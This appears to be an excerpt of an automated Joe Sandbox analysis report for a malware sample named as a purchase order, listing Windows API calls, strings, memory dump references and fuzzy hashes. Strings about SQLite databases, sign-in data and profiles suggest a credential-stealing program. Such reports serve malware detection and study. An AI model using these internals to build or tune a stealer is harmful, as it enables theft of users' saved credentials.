                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                      • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                      • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                      • String ID: ($d
                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                      • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                      • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                      APIs
                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3015003838-0
                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 59245283-0
                                                                                                      • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                      • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                      • free.MSVCRT ref: 004185AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2802642348-0
                                                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                      • String ID: 3A
                                                                                                      • API String ID: 3300951397-293699754
                                                                                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                      • String ID: strings
                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                      • API String ID: 776488737-1622828088
                                                                                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                      • String ID: sysdatetimepick32
                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: -journal$-wal
                                                                                                      • API String ID: 438689982-2894717839
                                                                                                      • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                      • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3975816621-0
                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                      APIs
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2313361498-0
                                                                                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
